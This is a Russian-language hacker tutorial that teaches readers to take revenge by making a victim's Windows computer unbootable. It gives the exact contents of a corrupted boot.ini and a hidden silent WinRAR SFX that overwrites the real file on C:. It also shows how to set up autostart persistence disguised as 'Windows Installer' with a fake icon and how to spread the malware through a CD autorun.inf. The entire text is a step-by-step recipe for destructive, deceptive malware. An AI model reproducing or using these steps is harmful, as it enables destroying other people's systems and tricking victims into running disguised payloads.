Ловкость рук и никакого программирования.

Наверняка, в жизни так случается , что кто-то вас обидит и ничего с этим не поделаешь. Некоторые могут возразить, что полезут драться, однако, не у всех такие крутые яйца. Да и что же делать, если обидчик находится в сети? А вот что - мы сломаем ему комп. Причем знание программирования нам не понадобится.

Неверный вход в ядро.

Знаешь что такое вход в ядро Windows? А что такое неверный вход в ядро Windows? J Наверное, догадываешься о чем пойдет речь? Да, мы сделаем программу, которая после запуска будет выполнять неверный вход в ядро Windows, что приведет к полной неработоспособности компьютера после перезагрузки.

Boot.ini

За вход в ядро отвечает файл boot.ini - вот его то мы и будем портить. Для начала создай текстовый документ и смени его расширение на ini.. Если не знаешь как менять расширение, то я помогу. В пункте меню окна зайди в СЕРВИС, затем в СВОЙСТВА ПАПКИ, щелкни по вкладке ВИД и в ДОПОЛНИТЕЛЬНЫХ ПАРАМЕТРАХ убери галочку с пункта СКРЫВАТЬ РАСШИРЕНИЯ ДЛЯ ЗАРЕГЕСТРИРОВАННЫХ ТИПОВ ФАЙЛОВ. Теперь ты можешь менять расширения файлов. В результате у тебя должен получиться пока пустой файл boot.ini.

Одно письмо ядру и жертве.

Приступим к заполнению нашего зловещего файла. Открой его и впиши следующее:

[boot loader] {здороваемся}

timeout=777 {время, в течение которого будет высвечиваться наше сообщение}

default=multi(777)disk(777)rdisk(777)partition(777 )\lang1033 WINDOWS {сбиваем с толку компьютер цифрами 777}

[operating systems] {ось}

multi(777)disk(777)rdisk(777)partition(777)=”Darov a perec! Tebya sdelali” /fastdetect /KERNEL=LOGOS.EXE {твое сообщение в кавычках должно быть напечатано английским шрифтом}

multi(777)disk(777)rdisk(777)partition(777)=”Sau_b ol virus v2” /fastdetect /KERNEL=LOGOS.EXE {если не хочешь, чтобы твое сообщение прочитала жертва, то не пиши эту строку}

Скрытность.

Сделаем наше письмо скрытным. Для этого щелкни правой кнопкой мыши (ПКМ) на файл boot.ini и в СВОЙСТВАХ поставь галочку напротив слова СКРЫТНЫЙ. Ламер ничего не заметит J

Пакуем.

Для паковки файла используем WinRar. Добавим наш файл в архив WinRAR. Для этого щелкни ПКМ на boot.ini и нажмем ДОБАВИТЬ В АРХИВ, в появившемся меню поставь галочку напртив СОЗДАТЬ SFX-АРХИВ. Теперь в КОММЕНТАРИЯХ WinRAR напиши следущее:

;Sau_bol v2

Path=c: {путь установки}

Silent=1 {эта команда скрывает все действия WinRAR}

Overwrite=1 {эта команда перезапишет файл boot.ini в случае, если он уже имеется на диске C:\}

В результате должен получиться файл boot.exe. В WinRAR можно сменить значок программы. Эта функция может тебе понадобиться.

Автозагрузка.

Несмотря на то, что boot.ini скрытный, не исключено, что его заметят. Конечно же, за этим последует его удаление :-(.. Чтобы решить данную проблему, добавим наш установщик в автозагрузку. Даже, если удалить boot.ini, то после перезагрузки он снова запишется на диск C: ;) Создай новую папку, назови её Windows Installer и сделай ее скрытной. Теперь перемести boot.exe в эту папку. Данная папка должна попасть в Program Files, а что её туда доставит? Правильно - снова наш WinRAR. Скажи спасибо Евгению Рошалю ;-) Добавим нашу папку Windows Installer в архив (смотри раздел Пакуем) и в комментариях напишем следующее:

; Sau_bol v2

Path=Common Files {наша папка и её содержимое установятся в Pogram FilesFiles}

Setup=boot.exe {запуск boot.exe после установки папки в Program Files}

Silent=1

Overwrite=1

Shortcut=T, "boot.exe", "", "", "Windows Installer" {при написании этой команды будь внимателен! Она добавляет boot.exe в автозагрузку. В этом вся фишка и заключается ;-)}

В результате получится файл Windows Installer.exe. В принципе можешь обозвать его как угодно J Для того, чтобы жертва не заподозрила неладное, смени значок у программы, однако, не у всех версий WinRAR’а это хорошо получается L Дело в том, что значок в старых версиях архиватора должен быть размером не более чем 32x32. Однако, маловато будет ;-( .Хочу тебя обнадежить - версия WinRaR35b4ru прекрасно справляется и со значками большего размера.

Оболванивание.

этот раздел посвящен оболваниванию во всех значениях этого слова J

Значение первое: запишем болванку так, чтобы жертва заразилась нашим вирусом, просто вставив диск в CD-ROM. Создай текстовый документ autorun.inf и впиши в него следующее:

[autorun]

OPEN=Windows Installer.exe {открывает наш вирус после вставки диска}

ICON= Windows Installer.exe, 0 {значок диска}

Можно для убедительности назвать файл не Windows Installer.exe, а Autorun.exe.